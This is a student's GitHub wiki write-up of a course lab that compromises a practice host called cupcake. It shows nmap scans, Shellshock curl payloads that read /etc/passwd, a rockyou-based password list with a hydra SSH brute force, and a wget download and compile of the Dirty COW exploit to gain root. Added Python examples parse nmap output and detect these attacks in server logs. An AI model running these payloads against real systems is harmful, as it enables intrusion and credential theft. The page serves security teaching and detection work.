Activity 4.1 Exploiting Cupcake - FlameSpyro/Tech-Journal GitHub Wiki

Activity 4.1 - Exploiting Cupcake

  • The purpose of this activity is to give you a sense of some of the steps taken to recon, assess, exploit, achieve a foothold and elevate privileges on a system.

Part 1: Active Recon

  • For this part we find that our target is cupcake.shire.org at 10.0.5.23. We need to find out more about this target without getting our hands dirty yet, so we check the top 100 TCP ports and see what the results are.
  • Once we find open ports, we run a second scan to do version detection.
  • Deliverable 1. Provide a screenshot of your team's version detection scan(s).
  • This is done by entering the following: sudo nmap 10.0.5.23 -A -sV
  • Then sudo nmap 10.0.5.23 -Pn -sV -p 1-100
  • Deliverable 2. Examine any applications that are publicly accessible. What did you find?
  • First off, these are the options used in our commands so far:
  • -Pn skips host discovery (treats the host as up instead of pinging it first)
  • -sV gives the service and version information
  • -p 1-100 scans ports 1 through 100
  • Ports 22 and 80 are open, running OpenSSH 5.3 and Apache 2.2.15 respectively
  • Deliverable 3. You should have the versions of at least two applications. Go ahead and hit the internet and see if your group can find: The operating system (this is easy) and the release (a bit harder). What did you find and how did you find it? Be prepared to share your findings with the rest of the class
  • OpenSSH version 5.3 (protocol 2.0) was on port 22
  • Apache version 2.2.15 (CentOS 6.2) was on port 80

Part 2: Dealing with Targets and Scans

  • Before starting, install nmaptocsv. It is very cool: it converts nmap output to CSV so the scan data can be placed in software such as Google Sheets, which we do here.
sudo apt install python3-pip
sudo pip install nmaptocsv
  • Deliverable 4. Provide a screenshot similar to the one below that shows your exported googlesheet of nmap scan data against cupcake. Note, the scan in the demo did not show version detection. See if you can figure out how to do that. You will have at least two ports.
  • This can be done with:
cat top100.txt
nmaptocsv -i top100.txt -d ","
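To show what nmaptocsv is doing with the top100.txt file, here is an added example (not part of the original page or of the nmaptocsv project) that parses nmap greppable (-oG) output into the same kind of CSV rows. The sample scan text is constructed here; its port and version values mirror the results reported above but it is not a capture from the lab machine.

```python
import csv
import io
import re

# Constructed sample of nmap greppable (-oG) output for the lab target. The
# values mirror the page's scan results, but this text is made up here.
SAMPLE_OG = """# Nmap 7.80 scan initiated as: nmap -sT -sV --top-ports=100 10.0.5.23 -Pn -oG top100.txt
Host: 10.0.5.23 (cupcake.shire.org)\tStatus: Up
Host: 10.0.5.23 (cupcake.shire.org)\tPorts: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/, 80/open/tcp//http//Apache httpd 2.2.15 ((CentOS))/\tIgnored State: closed (98)
# Nmap done -- 1 IP address (1 host up) scanned
"""

# 'Host: <ip> (<hostname>)' at the start of every data line
HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\(([^)]*)\)")
FIELDS = ["ip", "hostname", "port", "proto", "state", "service", "version"]


def parse_greppable(text):
    """Return one dict per port entry found in nmap -oG output."""
    rows = []
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue  # skip the '# Nmap ...' comment lines
        fields = line.split("\t")  # -oG separates sections with tabs
        m = HOST_RE.match(fields[0])
        if not m:
            continue
        ip, hostname = m.group(1), m.group(2)
        ports_field = next((f for f in fields if f.startswith("Ports:")), None)
        if ports_field is None:
            continue  # the 'Status: Up' line carries no port data
        # Each entry is port/state/proto/owner/service/rpcinfo/version/
        for entry in ports_field[len("Ports:"):].strip().split(", "):
            parts = entry.split("/")
            if len(parts) < 7:
                continue
            port, state, proto, _owner, service, _rpc, version = parts[:7]
            rows.append({
                "ip": ip,
                "hostname": hostname,
                "port": int(port),
                "proto": proto,
                "state": state,
                "service": service,
                # nmap writes '|' in place of '/' inside version strings
                "version": version.replace("|", "/"),
            })
    return rows


def to_csv(rows, delimiter=","):
    """Render the parsed rows as CSV text ready to paste into a spreadsheet."""
    buf = io.StringIO()
    w = csv.DictWriter(buf, fieldnames=FIELDS, delimiter=delimiter, lineterminator="\n")
    w.writeheader()
    w.writerows(rows)
    return buf.getvalue()


if __name__ == "__main__":
    print(to_csv(parse_greppable(SAMPLE_OG)))
```

Run it as-is to see the two rows for ports 22 and 80; pass a file's contents to parse_greppable to convert a real top100.txt.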

Part 3: Vulnerability Detection

  • Deliverable 5. What potential remote vulnerabilities did your team find?
  • We found that the web server appears to use Perl CGI, judging from the cgi-bin status script; the box is CentOS running Apache httpd 2.2.15 and OpenSSH.

Part 4: Remote Code Execution Vulnerability

  • Deliverable 6. Using the following screenshot as a point of departure, determine the target's running kernel version (you would use the uname command for this). Provide a screenshot that shows the major and minor release of the kernel.
  • The first nmap will run the shellshock script and use the whoami command
  • sudo nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/status,cmd="echo ; echo ; /usr/bin/whoami" 10.0.5.23
  • The second will use uname, which reports the specific kernel version
  • sudo nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/status,cmd="echo ; echo ; /bin/uname -a" 10.0.5.23
  • Deliverable 7. The following technique exposes the OS release. Show similar screenshots that show:
  • the contents of /etc/passwd
  • the code behind the status CGI
  • the results of running ifconfig
  • These can be found with the respective commands:
curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /var/www/cgi-bin/status' bash -s:'' HTTP://10.0.5.23/cgi-bin/status
curl -H 'User-Agent: () { :; }; echo ; echo ; /sbin/ifconfig' bash -s:'' HTTP://10.0.5.23/cgi-bin/status
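From the defender's side, the requests above leave a distinctive trace in the web server log: a header value that begins with the Bash function-definition prefix "() {". The following added example (not part of the original page) parses Apache combined-format access log lines and flags requests whose User-Agent or Referer carries that prefix. The log lines are constructed for the example and are not from the lab machine.

```python
import re

# Shellshock (CVE-2014-6271) trigger: a Bash function definition '() {'
# placed in an HTTP header value that gets exported into the CGI environment.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")

# Apache 'combined' format: ip ident user [time] "request" status bytes "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>.*)"$'
)

# Constructed sample log lines (not a real capture). Lines 2 and 3 carry the
# header pattern used by the curl commands on this page; lines 1 and 4 are benign.
SAMPLE_LOG = """10.0.5.50 - - [10/Oct/2023:12:00:01 -0400] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.0.5.60 - - [10/Oct/2023:12:00:05 -0400] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :; }; echo ; echo ; /bin/cat /etc/passwd"
10.0.5.60 - - [10/Oct/2023:12:00:09 -0400] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /sbin/ifconfig"
10.0.5.70 - - [10/Oct/2023:12:00:12 -0400] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "curl/7.68.0"
"""


def parse_combined(line):
    """Split one combined-format line into named fields, or None if it does not match."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def find_shellshock_attempts(log_text):
    """Return one record per request whose User-Agent or Referer carries '() {'."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_combined(line)
        if rec is None:
            continue
        for header in ("ua", "referer"):
            if SHELLSHOCK_RE.search(rec[header]):
                hits.append({
                    "ip": rec["ip"],
                    "path": rec["path"],
                    "header": header,
                    "value": rec[header],
                    # a CGI path makes the request far more likely to have worked
                    "cgi": rec["path"].startswith("/cgi-bin/"),
                })
                break
    return hits


if __name__ == "__main__":
    for h in find_shellshock_attempts(SAMPLE_LOG):
        print(f"{h['ip']} -> {h['path']} via {h['header']}: {h['value']!r} (cgi={h['cgi']})")
```

Only the User-Agent and Referer are logged by the default combined format; a server that logs other client headers can feed them into the same pattern check.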

Part 5: The foothold

  • Here we build a password list using the zcat command!
  • Deliverable 8. Armed with the contents of /etc/passwd, let's see if we can build a list of likely passwords for the target account. You should end up with 28 passwords in your list. Provide a screenshot that shows how you generated the list as well as the list contents.
  • zcat /usr/share/wordlists/rockyou.txt.gz | grep -i samwise >> passwords.txt
  • cat passwords.txt
  • Time for some BRUTE FORCE!!! Here we use hydra to test the passwords against SSH.
  • NOTE: to prevent further headaches, add the line "HostKeyAlgorithms ssh-rsa,ssh-dss" to the /etc/ssh/ssh_config file and then restart the service.
  • Then run: hydra -l samwise -P passwords.txt 10.0.5.23 -t 4 ssh
  • Time to login with our newly stolen password!
cat user-flag.txt
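A hydra run like the one above shows up on the target as a burst of "Failed password" entries from one source followed by an "Accepted password" line. The following added example (not part of the original page) reads sshd auth-log lines, flags source addresses with a burst of failures inside a time window, and records any user whose login from that address was accepted afterwards. The log lines are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime

FAILED_RE = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)
ACCEPTED_RE = re.compile(
    r"sshd\[\d+\]: Accepted (?:password|publickey) for (?P<user>\S+) from (?P<ip>\S+) port \d+"
)
TS_RE = re.compile(r"^(?P<ts>\w{3} \d{1,2} \d{2}:\d{2}:\d{2}) ")

# Constructed sample auth log (not a real capture): six failures from one
# source for 'samwise' within a few seconds, then a success; one stray failure elsewhere.
SAMPLE_AUTH = """Oct 10 12:01:01 cupcake sshd[1201]: Failed password for samwise from 10.0.5.60 port 51000 ssh2
Oct 10 12:01:02 cupcake sshd[1202]: Failed password for samwise from 10.0.5.60 port 51001 ssh2
Oct 10 12:01:03 cupcake sshd[1203]: Failed password for samwise from 10.0.5.60 port 51002 ssh2
Oct 10 12:01:04 cupcake sshd[1204]: Failed password for samwise from 10.0.5.60 port 51003 ssh2
Oct 10 12:01:05 cupcake sshd[1205]: Failed password for samwise from 10.0.5.60 port 51004 ssh2
Oct 10 12:01:06 cupcake sshd[1206]: Failed password for samwise from 10.0.5.60 port 51005 ssh2
Oct 10 12:01:09 cupcake sshd[1210]: Accepted password for samwise from 10.0.5.60 port 51008 ssh2
Oct 10 12:02:00 cupcake sshd[1300]: Failed password for invalid user admin from 10.0.5.70 port 40000 ssh2
"""


def _timestamp(line, year):
    """Syslog lines carry no year, so the caller supplies one."""
    m = TS_RE.match(line)
    return datetime.strptime(f"{year} {m.group('ts')}", "%Y %b %d %H:%M:%S") if m else None


def detect_bruteforce(log_text, threshold=5, window_seconds=60, year=2023):
    """Flag IPs with >= threshold failures inside window_seconds and list users
    accepted from that IP after the last failure (a likely guessed password)."""
    failures = defaultdict(list)   # ip -> [timestamp, ...]
    accepted = defaultdict(list)   # ip -> [(timestamp, user), ...]
    for line in log_text.splitlines():
        line = re.sub(r"\s+", " ", line.strip())  # collapse 'Oct  1' style padding
        ts = _timestamp(line, year)
        if ts is None:
            continue
        m = FAILED_RE.search(line)
        if m:
            failures[m.group("ip")].append(ts)
            continue
        m = ACCEPTED_RE.search(line)
        if m:
            accepted[m.group("ip")].append((ts, m.group("user")))

    alerts = {}
    for ip, times in failures.items():
        times.sort()
        # sliding window: largest number of failures within window_seconds
        best, j = 0, 0
        for i in range(len(times)):
            while (times[i] - times[j]).total_seconds() > window_seconds:
                j += 1
            best = max(best, i - j + 1)
        if best >= threshold:
            last_fail = times[-1]
            guessed = sorted({u for (t, u) in accepted.get(ip, []) if t >= last_fail})
            alerts[ip] = {"failures": len(times), "burst": best, "compromised_users": guessed}
    return alerts


if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_AUTH).items():
        print(f"{ip}: {info['failures']} failures, burst {info['burst']}, "
              f"logged in afterwards as {info['compromised_users'] or 'nobody'}")
```

The threshold and window are tunable; a lab-sized list of 28 passwords with -t 4 produces a burst well above the defaults here.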

Part 6: Root Compromise

  • We're in! Now time to get to root!
  • The following spoiler video shows a method for achieving root compromise. Feel free to try others. There is the potential here to break the system. If you've done so, this is ok. You have the power to access this target in vCenter only to revert the snapshot and power it back on again. When using any technique that alters accounts on the system, make sure you use your own unique username so that you don't wipe out someone else's work.
  • In champuser
searchsploit -m 40839
ls
uname -a
  • In samwise
gcc -v
  • Back to champuser
python3 -m http.server 8086
  • In samwise
ls
cd sf
wget http://**yourip**:8086/40839.c
ls
cat 40839.c
gcc 40839.c -o cow -lpthread -lcrypt
ls
./cow
ls /tmp
cat /tmp/passwd.bak
su - firefart  # the prompt changes from $ to #, indicating root
id
ls
id
cat root-flag.txt

Summary

  • How you determined the versions of the two services exposed by cupcake?
    • sudo nmap 10.0.5.23 -A -sV gave us OpenSSH version 5.3 (protocol 2.0) and Apache version 2.2.15 (CentOS 6.2)
  • How you dealt with parsing nmap result with nmaptocsv
TARGET=10.0.5.23; sudo nmap -sT -sV --top-ports=100 $TARGET -Pn -oG top100.txt
nmaptocsv -i top100.txt -d ","
  • Copy to google sheets!
  • The techniques you used to invoke remote code execution
sudo nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/status,cmd="echo ; echo ; /usr/bin/whoami" 10.0.5.23
sudo nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/status,cmd="echo ; echo ; /bin/uname -a" 10.0.5.23
curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s:'' HTTP://10.0.5.23/cgi-bin/status
curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /var/www/cgi-bin/status' bash -s:'' HTTP://10.0.5.23/cgi-bin/status
curl -H 'User-Agent: () { :; }; echo ; echo ; /sbin/ifconfig' bash -s:'' HTTP://10.0.5.23/cgi-bin/status
  • The generation of a list of passwords and subsequent ssh bruteforce
zcat /usr/share/wordlists/rockyou.txt.gz | grep -i samwise >> passwords.txt
hydra -l samwise -P passwords.txt 10.0.5.23 -t 4 ssh
ssh samwise@10.0.5.23
  • Transfer of files using python and wget or any other mechanism you chose
    • wget http://**yourip**:8086/40839.c (run in samwise)
  • Compiling and running a privilege escalation exploit
gcc 40839.c -o cow -lpthread -lcrypt
./cow
cat /etc/passwd  # you will see the new user firefart at the top
cat /tmp/passwd.bak
su - firefart  # the prompt changes from $ to #, indicating root
id
cat root-flag.txt

Final Thoughts

  • This lab was really cool to get my hands on brute forcing into a machine and working up to root! I still need general work on the recon process, but outside of that I think I can do fairly well!